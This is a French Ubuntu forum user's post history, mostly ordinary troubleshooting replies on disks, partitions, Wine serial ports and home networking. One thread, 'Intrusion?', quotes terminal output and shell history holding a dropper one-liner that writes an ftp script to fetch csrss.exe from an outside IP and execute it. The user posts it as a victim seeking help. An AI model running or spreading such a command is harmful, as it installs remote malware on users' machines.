Contenu | Rechercher | Menus

Annonce

Si vous rencontrez des soucis à rester connecté sur le forum (ou si vous avez perdu votre mot de passe) déconnectez-vous et reconnectez-vous depuis cette page, en cochant la case "Me connecter automatiquement lors de mes prochaines visites".
Test de l'ISO d'Ubuntu francophone : nous avons besoin de testeurs pour la version francophone d'Ubuntu 14.04. Liens et informations ici.
nombre réponses : 25

#0 Re : -1 »  Clavier qui mange des lettres » Le 21/09/2011, à 19:41

solho
Réponses : 12

salut...

Tu ne précise pas, mais s'il s'agit d'un clavier sans fil, ça peut venir des piles ou bien d'interférences entre le clavier et le recepteur... expèrience vécue...

Cordialement

#1 -1 »  Wine, ttyS0 redirigé vers COM1... » Le 26/07/2013, à 15:31

solho
Réponses : 0

Salut à tous,

Je me permet un petit retour d'expérience (pour ceux qui galèreraient comme moi)

Suite à une (grosse) défaillance d'un PC portable qui tournait sous winXP pour un prog professionel, je me suis dit que j'allais tout faire tourner sous Ubuntu. Aprés l'achat d'une carte Pcie pour le port série (eh oui, on en trouve de moins en moins d'origine sur le PC), j'ai tenté une virtualisation d'XP puis une installation du logiciel sous wine... mais je n'arrivé pas à communiquer avec mon port série.
Aprés moult recherches sur le net, j'ai crée un lien symbolique (pour wine, j'avais abandonné virtualbox) de ttyS0 vers COM1... Tout semblait correct (lien, permissions) mais rien ne marchait... Aaarrrgh...

Eh vas-y que je tente de modifier ttyS0, stty, setserial, minicom, statserial pour controler... Rien ne semblait y faire...
Puis le déclic en regardant dans le répertoire /dev, Il y a plusieurs ttyS#...

Quelques lignes de commandes statserial plus tard, je me suis rendu compte qu'en fait mon port série était sur ttyS4 au lieu de ttyS0 (sur 32 ttyS#)

Donc, les infos sur le net, c'est bien, mais ça n'explique pas tout...

Bon, la morale de cette histoire, si vous avez du mal à faire pointer un prog sous wine ou virtualbox vers un port série, ne vous focaliser pas que sur ttyS0...

#2 Re : -1 »  partition bloqué en root » Le 06/09/2011, à 00:27

solho
Réponses : 16

Salut...

Vu ici, peut-être une piste...

Redimensionnement et déplacement : Pour redimensionner ou déplacer une partition, il faut faire un clic-droit sur celle-ci, puis sélectionner l'option Resize/Move. Toutefois, il faut prendre en compte les contraintes suivantes :

    -Une partition ne peut être agrandie que s'il y a de l'espace libre non partitionné immédiatement avant la partition (dans le cas d'un redimensionnement vers la gauche) ou après la partition (dans le cas d'un redimensionnement vers la droite) ;
   -Pour redimensionner une partition étendue ou un lecteur logique présent dans une partition étendue, tous les lecteurs logiques dans la partition étendue doivent être démontés.

t'as bon pour la 1ère condition, pour la seconde, il faut que tu démontes tout dans sda2, notamment la swap... qui te pose problème... et qui à mon avis te vérouille de fait sda2...

A tout hasard, en LiveCD, tu pourrais peut-être lancé Gparted en root (gksudo gparted)... Je ne me souviens plus si je l'ai fait, mais il me semble que c'est possible...

Cordialement

#3 -1 »  Intrusion? » Le 27/02/2013, à 11:14

solho
Réponses : 11

Bonjour à tous,

Je viens vers vous pour savoir si mon PC n'aurait pas été "visité" à l'insu de mon plein gré...

Le Contexte:

Mon PC s'allume automatiquement vers 7h, puis lance la session Ubuntu 12.10( connection automatique au démarrage). Les progs qui se lancent au démarrage sont Dropbox, cairo-dock, et ce matin le gestionnaire de MàJ (je ne parle pas des services et autres que je ne connais pas).

Ce qui m'ennuie, c'est qu'avec cairo-dock, j'ai une petite fenêtre de terminal qui s'affiche et qui contenait ces lignes ce matin, au lieu de l'habituel 'solho@solho-V-M4A3000E:~$':

[5] 4004
[6] 4005
[7] 4006
ftp: s: unknown option
Commande 'del' non trouvée, vouliez-vous dire :
Commande 'del' non trouvée, vouliez-vous dire :
 La commande 'mdel' du paquet 'mtools' (main)
 La commande 'delp' du paquet 'fp-utils-2.6.0' (universe)
 La commande 'wdel' du paquet 'wput' (universe)
 La commande 'el' du paquet 'oneliner-el' (universe)
 La commande 'mdel' du paquet 'mtools' (main)
csrss.exe : commande introuvable
 La commande 'delp' du paquet 'fp-utils-2.6.0' (universe)
 La commande 'tel' du paquet 'orville-write' (universe)
 La commande 'wdel' du paquet 'wput' (universe)
 La commande 'deal' du paquet 'deal' (universe)
 La commande 'el' du paquet 'oneliner-el' (universe)
 La commande 'hdel' du paquet 'hfsutils' (main)
 La commande 'tel' du paquet 'orville-write' (universe)
 La commande 'bel' du paquet 'belier' (universe)
 La commande 'deal' du paquet 'deal' (universe)
 La commande 'qdel' du paquet 'torque-client' (universe)
 La commande 'hdel' du paquet 'hfsutils' (main)
 La commande 'qdel' du paquet 'gridengine-client' (universe)
 La commande 'bel' du paquet 'belier' (universe)
 La commande 'qdel' du paquet 'slurm-llnl-torque' (universe)
 La commande 'qdel' du paquet 'torque-client' (universe)
 La commande 'qdel' du paquet 'torque-client-x11' (universe)
 La commande 'qdel' du paquet 'gridengine-client' (universe)
 La commande 'qdel' du paquet 'slurm-llnl-torque' (universe)
del : commande introuvable
 La commande 'qdel' du paquet 'torque-client-x11' (universe)
del : commande introuvable
[2]   Fini                    echo open 190.24.211.230 10699 >> eq
[3]   Fini                    echo user 18653 9875 >> eq
[2]   Fini                    echo open 190.24.211.230 10699 >> eq
[3]   Fini                    echo user 18653 9875 >> eq
[4]   Fini                    echo get csrss.exe >> eq
[5]   Fini                    echo quit >> eq
[6]-  Termine 1               ftp -n -s:eq
solho@solho-V-M4A3000E:~$ [2]   Fini                    echo open 190.24.211.230 10699 >> eq

[1]-  Termine 127             del eq
[7]+  Termine 127             csrss.exe
solho@solho-V-M4A3000E:~$ 

Je ne fais pas de ftp consciemment, hormis Dropbox, je ne vois pas...

Une recherche sur l'IP me mêne en Colombie, chez "Corporativos24211-230.etb.net.co"??? et
Informations relevées Le 27-02-2013 à 08:17:09
Zone Géographique : Amérique Latine et Iles des Caraïbes
Pays de Connexion : COLOMBIA 
Ville de Connexion : Indéterminé
FAI : Inconnu
Réseau : Indéterminé

De plus csrss.exe etant plutot windowsien, je ne vois pas ce qu'il vient faire ici... J'ai bien un autre PC  XP branché sur Ubuntu via reminna mais je lance la connection manuellement et elle n'était pas lancée à ce moment...


Mes Questions:

Qu'est-ce que c'est que ce truc???
Est-ce grave, Docteur?
AI-je une grosse faille de sécurité sur mon PC?

PS: je ne relance pas le PC malgré mise à jour, si quelqu'un voudrait des logs particuliers.

Merci d'avance pour votre aide et éclaircissements

#4 Re : -1 »  Intrusion? » Le 27/02/2013, à 12:21

solho
Réponses : 11

Merci de te pencher sur ce problème et de me donner quelques pistes d'investigations... Commande lancée seulement avec dropbox et Remmina, le gestionnaire de MàJ n'est pas fermé non plus.

solho@solho-V-M4A3000E:~$ netstat -tanu
Connexions Internet actives (serveurs et établies)
Proto Recv-Q Send-Q Adresse locale          Adresse distante        Etat      
tcp        0      0 0.0.0.0:139             0.0.0.0:*               LISTEN     
tcp        0      0 0.0.0.0:5900            0.0.0.0:*               LISTEN     
tcp        0      0 127.0.1.1:53            0.0.0.0:*               LISTEN     
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN     
tcp        0      0 127.0.0.1:631           0.0.0.0:*               LISTEN     
tcp        0      0 0.0.0.0:17500           0.0.0.0:*               LISTEN     
tcp        0      0 0.0.0.0:445             0.0.0.0:*               LISTEN     
tcp        1      0 192.168.1.3:39571       91.189.89.144:80        CLOSE_WAIT 
tcp        0      0 192.168.1.3:42421       173.194.45.41:443       TIME_WAIT  
tcp        0      0 192.168.1.3:32816       192.168.1.4:5900        TIME_WAIT  
tcp        0      0 192.168.1.3:39433       199.47.216.147:80       ESTABLISHED
tcp        0      0 192.168.1.3:48387       173.194.78.125:5222     TIME_WAIT  
tcp        0      0 192.168.1.3:54720       192.168.1.4:17500       ESTABLISHED
tcp6       0      0 :::5800                 :::*                    LISTEN     
tcp6       0      0 :::139                  :::*                    LISTEN     
tcp6       0      0 :::5900                 :::*                    LISTEN     
tcp6       0      0 :::22                   :::*                    LISTEN     
tcp6       0      0 ::1:631                 :::*                    LISTEN     
tcp6       0      0 :::445                  :::*                    LISTEN     
udp        0      0 127.0.1.1:53            0.0.0.0:*                          
udp        0      0 192.168.1.255:137       0.0.0.0:*                          
udp        0      0 192.168.1.3:137         0.0.0.0:*                          
udp        0      0 0.0.0.0:137             0.0.0.0:*                          
udp        0      0 192.168.1.255:138       0.0.0.0:*                          
udp        0      0 192.168.1.3:138         0.0.0.0:*                          
udp        0      0 0.0.0.0:138             0.0.0.0:*                          
udp        0      0 0.0.0.0:48199           0.0.0.0:*                          
udp        0      0 0.0.0.0:17500           0.0.0.0:*                          
udp        0      0 0.0.0.0:5353            0.0.0.0:*                          
udp6       0      0 :::41799                :::*                               
udp6       0      0 :::5353                 :::*                               
solho@solho-V-M4A3000E:~$ 

Les IP hors réseau local semble correspondre à Dropbox et Google inc., rien de suspect à priori...
Je vais essayer de voir si je peux retrouver l'historique du terminal de Cairo-dock, car je ne retrouve pas d'autre commandes que celle que j'ai pu taper dans Terminal en faisant la flèche "up"...

#5 Re : -1 »  Intrusion? » Le 27/02/2013, à 12:44

solho
Réponses : 11

Bon, on va peut-être y voir plus clair, je viens de trouver et lancer la commande "history":

solho@solho-V-M4A3000E:~$ history
    1  papsd machinarium
    2  padsp machinarium
    3  fsdisk -l
    4  fdisk -l
    5  sudo fdisk -l
    6  sudo add-apt-repository ppa:webupd8team/haguichi && sudo apt-get update && sudo apt-get install haguichi
    7  open-ssh
    8  openssh
    9  ssh
   10  open_ssh config
   11  open-ssh
   12  Open-ssh
   13  OpenSSH
   14  sshd
   15  sudo apt-get install openssh-server
   16  haguichi
   17  configure hamachi
   18  hamachi
   19  hamachi leave
   20  hamachi logoff
   21  hamachi logon
   22  hamachi
   23  hamachi command
   24  hamachi join 143-610-542
   25  hamachi do-join 143-610-542
   26  hamachi logoff
   27  sudo apt-get install chkconfig
   28  sudo apt-get -f install chkconfig
   29  man apt-get
   30  ape-get search chkconfig
   31  apt-get search chkconfig
   32  apt-get --search chkconfig
   33  man apt-get
   34  sudo testdisk
   35  sudo apt-get install testdisk
   36  sudo testdisk
   37  sudo add-apt-repository ppa:cairo-dock-team/ppa
   38  sudo apt-get update
   39  sudo apt-get install cairo-dock cairo-dock-plug-ins
   40  exit
   41  toonloop
   42  man ffmpeg
   43  exit
   44  sudo apt-get install mixxx
   45  exit
   46  htop
   47  top
   48  libreoffice
   49  sudo apt-get install htop
   50  htop
   51  clear
   52  dir
   53  sudo chown -R solho:solho /Dropbox
   54  sudo chown -R solho:solho :home/solho/Dropbox
   55  sudo chown -R solho:solho /home/solho/Dropbox
   56  clear
   57  sudo haltnow
   58  sudo halt
   59  %systemroot%\system32\cmd.exe
   60  del eq&echo open 190.24.211.230 10699 >> eq&echo user 18653 9875 >> eq &echo get csrss.exe >> eq &echo quit >> eq &ftp -n -s:eq &csrss.exe &del eq
   61  history
solho@solho-V-M4A3000E:~$ 

Bien, jusqu'à n°58, il y a de forte chance que ce soit mon oeuvre, par contre ensuite...

#6 Re : -1 »  Intrusion? » Le 27/02/2013, à 19:08

solho
Réponses : 11

Re... Excusez mon retard, mais boulot boulot avant tout...

Bien, je clarifie un peu les chose, les 2 pc sont dans un batiment d'élevage, et aucun "Kevin" n'est passé par là (aucune trace sur cam ip) en dehors des heures d'ouverture...

@tiramiseb, les résultats de la commande

solho@solho-V-M4A3000E:~$ sudo netstat -tlnpu
[sudo] password for solho: 
Connexions Internet actives (seulement serveurs)
Proto Recv-Q Send-Q Adresse locale          Adresse distante        Etat       PID/Program name
tcp        0      0 0.0.0.0:139             0.0.0.0:*               LISTEN      978/smbd        
tcp        0      0 0.0.0.0:5900            0.0.0.0:*               LISTEN      1964/vino-server
tcp        0      0 127.0.1.1:53            0.0.0.0:*               LISTEN      1433/dnsmasq    
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      981/sshd        
tcp        0      0 127.0.0.1:631           0.0.0.0:*               LISTEN      1063/cupsd      
tcp        0      0 0.0.0.0:17500           0.0.0.0:*               LISTEN      1997/dropbox    
tcp        0      0 0.0.0.0:445             0.0.0.0:*               LISTEN      978/smbd        
tcp6       0      0 :::5800                 :::*                    LISTEN      1964/vino-server
tcp6       0      0 :::139                  :::*                    LISTEN      978/smbd        
tcp6       0      0 :::5900                 :::*                    LISTEN      1964/vino-server
tcp6       0      0 :::22                   :::*                    LISTEN      981/sshd        
tcp6       0      0 ::1:631                 :::*                    LISTEN      1063/cupsd      
tcp6       0      0 :::445                  :::*                    LISTEN      978/smbd        
udp        0      0 127.0.1.1:53            0.0.0.0:*                           1433/dnsmasq    
udp        0      0 192.168.1.255:137       0.0.0.0:*                           1571/nmbd       
udp        0      0 192.168.1.3:137         0.0.0.0:*                           1571/nmbd       
udp        0      0 0.0.0.0:137             0.0.0.0:*                           1571/nmbd       
udp        0      0 192.168.1.255:138       0.0.0.0:*                           1571/nmbd       
udp        0      0 192.168.1.3:138         0.0.0.0:*                           1571/nmbd       
udp        0      0 0.0.0.0:138             0.0.0.0:*                           1571/nmbd       
udp        0      0 0.0.0.0:48199           0.0.0.0:*                           1025/avahi-daemon: 
udp        0      0 0.0.0.0:17500           0.0.0.0:*                           1997/dropbox    
udp        0      0 0.0.0.0:5353            0.0.0.0:*                           1025/avahi-daemon: 
udp6       0      0 :::41799                :::*                                1025/avahi-daemon: 
udp6       0      0 :::5353                 :::*                                1025/avahi-daemon: 
solho@solho-V-M4A3000E:~$ 

Normalement, ma box fait office de firewall, j'ai fait les reglages pour pouvoir me connecter à distance via mon smartphone (pc xp, cam ip, et mais je n'y arrive plus depuis que j'ai changé mon smartphone, pc linux via open ssh )

#7 Re : -1 »  le CPL (Courant Porteur en Ligne) » Le 05/12/2011, à 13:25

solho
Réponses : 15

Mathias024, j'ai l'impression que tu confonds 2 choses...

Pour reprendre ce qu'a dit Brunod, et peut-être bien clarifier la chose, Il ne faut pas que tu confondes le débit d'internet et celui de ton réseau domestique...
Le débit d'internet, autrement dit, celui qui arrive et part de ton Modem/Routeur/Box dépends essentielement de la distance à laquelle tu te trouves de ton central téléphonique, et de la qualité de la ligne France Télécom... Mis à part quelques petits réglages (qui de toutes façons ne joueront pas significativement sur le débit), tu ne pourras rien améliorer la dessus (en gros, sans vouloir te décevoir, tu risque encore tourner à 512Ko/s quelque temps; d'ailleurs, il serait judicieux que tu nous précise ton type d'abonnement (ADSL, Re-ADSL...))

Pour ce qui est de ton réseau domestique (ce qui est aprés ton Modem/Routeur/Box), la vitesse dépendra du types de connections que tu utilises, sachant qu'en gros, du plus rapide au moins rapide (avis perso) Ethernet(cable)>CPL>Wifi, et qu'effectivement ton débit sera nettement supérieur à celui de ta connection Internet, MAIS uniquement entre les appareils connectés au réseau domestique, le débit d'internet restant limité par ta Ligne France Télécom.

En espérant que les choses te paraissent plus clair à présent, cordialement

#8 Re : -1 »  nettoyage disque dur » Le 24/09/2011, à 07:41

solho
Réponses : 4

Salut...

De mémoire, il me semble avoir lu quelque part sur le forum que cette commande ne "se termine pas" au sens de te dire "fichier ecrit, vous pouvez fermez cette fenêtre". Il me semble bien que celle-ci remplie l'espace disque jusqu'à saturation, puis le message d'erreur apparait...
Essaie de voir dans le forums si tu trouve des topics similaires au tiens qui utilise cette commande, tu trouveras peut être plus d'infos (il me semble qu'il y a peut être aussi une possibilité de plusieur passe, à moins que ce soit avec une autre commande (shred ou dans le genre))...

cordialement

#9 Re : -1 »  Convertir .iso vers .wbfs (Wii) » Le 17/12/2011, à 09:37

solho
Réponses : 2

Salut...

Regarde Wiithon dans la doc, aussi une recherche wbfs sur le forum devrait te donner quelques solutions (pas encore testées pour ma part)...

Cordialement

#10 Re : -1 »  [Resolu] Alexandria a Disparu Aprés passage à Oneiric! » Le 01/11/2011, à 12:28

solho
Réponses : 8

Salut...

Tu peux essayer "cl-alexandria" dans la logithèque, sinon, tu peux trouver un deb sur le site officiel, section download en prenant le lien debian...
Pour vérifier si tes données sont présentes, tu peux, de mémoire, vérifier si tu as un répertoire ".alexandria" dans ton home (ctrl-h si tu ne le vois pas, c'est un répertoire caché).

En espérant t'avoir aidé, cordialement

#11 Re : -1 »  ubuntu sur machine avec ssd et DD mécanique » Le 28/11/2011, à 13:32

solho
Réponses : 6

Salut....

Bien que non spécialiste:
-Je ne pense pas que 8Go de swap soit nécessaire, 1 ou 2 devraient être suffisant.
-Là je ne suis absolument pas sûr, mais je ne vois pas ce qui pourrai t'empêcher de faire le partitionnement que tu souhaites... Lors de l'installation, tu peux définir les emplacements des principaux répertoires sur tes disques, la seule interrogation qui me vient à l'esprit est si tu peux faire tes 3 répertoires en une opération...voir peut-être définir ton /home aprés l'installation...?

En tous cas, pour ce dernier point, tu ne risque pas grand chose à essayer (bon pour une ré-installation si ça ne marche pas). Mais je comprendrai que tu attendes d'autres avis certainement plus éclairés que le mien...

Cordialement

#12 Re : -1 »  IP d'un compte » Le 27/11/2011, à 18:45

solho
Réponses : 5

En lui demandant, tout simplement...

#13 Re : -1 »  [Résolu] Impossible de se connecter au blog de Korben » Le 09/11/2011, à 17:30

solho
Réponses : 15

Bon, j'apporte pas de solutions, mais Korben réponds bien sous firefox 7.0.1 chez moi... ,je viens de tester à l'instant... (FAI SFR)

#15 Re : -1 »  Une nouvelle boutique du libre ! » Le 11/09/2011, à 16:37

solho
Réponses : 12

Ah, une boutique que je visiterais avec plaisir...

#16 Re : -1 »  Celestial Mechanica Linux » Le 28/09/2011, à 16:39

solho
Réponses : 4

je suis ce topic...
Merci pour l'info

#17 Re : -1 »  Plantage lors de gros transferts » Le 28/09/2011, à 10:26

solho
Réponses : 2

Salut...

Essaie d'être un peu plus précis, comme la taille des fichiers transférés, les systèmes de fichiers utilisés (surtout coté windows, certain systémes de fichiers ont une taille limite pour chaque fichiers). Cela permettra aux autres de cerner plus facilement le problème...

Cordialement

#18 Re : -1 »  TUTO conky sur pc distant via SSH -X » Le 06/09/2011, à 18:21

solho
Réponses : 10

Merci pour ce tuto intèressant...

#19 Re : -1 »  [résolu]récupération de données avec photorec et ddrescue » Le 03/09/2011, à 11:20

solho
Réponses : 7

Bonjour,

Je viens de lire en diagonale, mais le sujet semble intèressant.... un petit commentaire pour le garder sous la main et , mais surtout, pour te remercier de ce retour d'expérience qui servira surement à de nombreuses autres personnes.

Cordialement

#20 Re : -1 »  [Résolu] Non concordance de l'espace disponible sur mon DD » Le 12/09/2011, à 13:22

solho
Réponses : 4

salut...
tu n'as pas précisé le système de fichier utilisé, mais je suppose que ce doit être de l'ext2/3/4...
Lors de la création de la partition, le système réserve par défaut une partie de l'espace pour garantir le fonctionnement du système lorsque le disque commence à être bien plein. En règle générale, pour ne pas dire par défaut, celui-ci est de l'ordre de 5%.
Si je regarde tes infos, 5% de 134Go = 6.7GOo et 134Go-127Go= 7Go... on peut donc dire que c'est bien les 5% de réserve du système de fichiers qui explique ta différence d'espace...
Récemment, ce problème à été abordé dans le forum avec la commande qui permet de modifier l'espace réservé... Je ne l'ai pas sous la main, mais j'essaierais de le retrouver et de te donner le lien plus tard...

Cordialement

#21 Re : -1 »  Problème Disque dur » Le 10/09/2011, à 08:55

solho
Réponses : 3

Salut...

Pour la faire courte, Windows ne gère pas les système de fichiers utilisé par Ubuntu, il ne sait pas les "lire", ni y écrire (ext2/3 sont, via un petit utilitaire à installer, gérable mais je n'ai jamais testé et je ne serais dire si c'est vraiment fiable).
Il est donc normal que tu ne vois pas ton disque Ubuntu depuis windows (par contre l'inverse est possible, Ubuntu gérant le ntfs).
Si tu as besoin de partager des fichiers entre win et Ubuntu, une méthode simple est de créer une partition "d'échange" en Fat32 ou bien NTFS...

Pour ce qui est du boot, pas trop d'idée... sorry

Cordialement

#22 Re : -1 »  Impossible de partitilonner mon disque dur » Le 07/09/2011, à 09:28

solho
Réponses : 15

Salut....

A mon avis, c'est que tu n'as pas d'espace disponible sur ton hdd pour Ubuntu... Si ta partiton windows occupe tout le disque, il va falloir d'abord que tu la redimensionne (aprés de bonnes défragmentations, et une sauvegarde de tes fichiers/dossiers importants au cas où...)afin de libérer de la place pour Ubuntu.
Si ce n'est pas le cas, alors le problème vient d'ailleur (espace disponible insuffisant?).

Cordialement

#23 Re : -1 »  [résolu] Impossible d'effacer des dossiers sur HDD externe » Le 06/09/2011, à 23:52

solho
Réponses : 10

salut...

Charroux, lit bien le topic depuis le debut...

echo-echo, erreur entré/sortie, ça me semble plus un probléme sur le hdd, non? (secteur défecteux dans le pire des cas...)
Peut-être devrais-tu effectuer une réparation de ton systéme de fichiers (via Gparted ou bien avec fsck directement) ? Parfois, ça débloque une situation dans ce genre... Bien entendu, ne pas oublier de sauvegarder ses données les plus chère...

Cordialement

#24 Re : -1 »  [Résolu] Disque toujours plein !!! » Le 04/09/2011, à 11:18

solho
Réponses : 7

Salut...

Le dossier Lost&Found est , si je ne me trompe pas, utilisé lorsque tu fais une réparation/analyse de ton système de fichier (automatique ou manuel). Les fichiers récupérés sont placés dans ce répertoire.
Pour y accéder, il me semble que je faisais un "gksudo nautilus" pour ouvrir l'explorateur avec les droits root, puis me rendait dans le dossier pour y voir les donner.

Tu ne perdrait rien à essayer, si tu as vidé les corbeilles, et bien vérifié que tu n'ais pas d'autres fichiers/répertoires cachés (ctrl+H pour les afficher), peut-être que ton probléme est ici...
Ceci dit, comme souligné par jilucorg, il est fort possible que le "problème" soit lié aussi au 5% de réserve du système de fichier (ici, grosso modo, 23 Go). Donc, si tu supprimes plus de 23 Go de données, tu devrais voir ton compteur d'espace libre remonter (hypothèse qui me semble assez plausible), ce qui confirmera que c'est l'espace "de secours" qui te posait problème...

Cordialement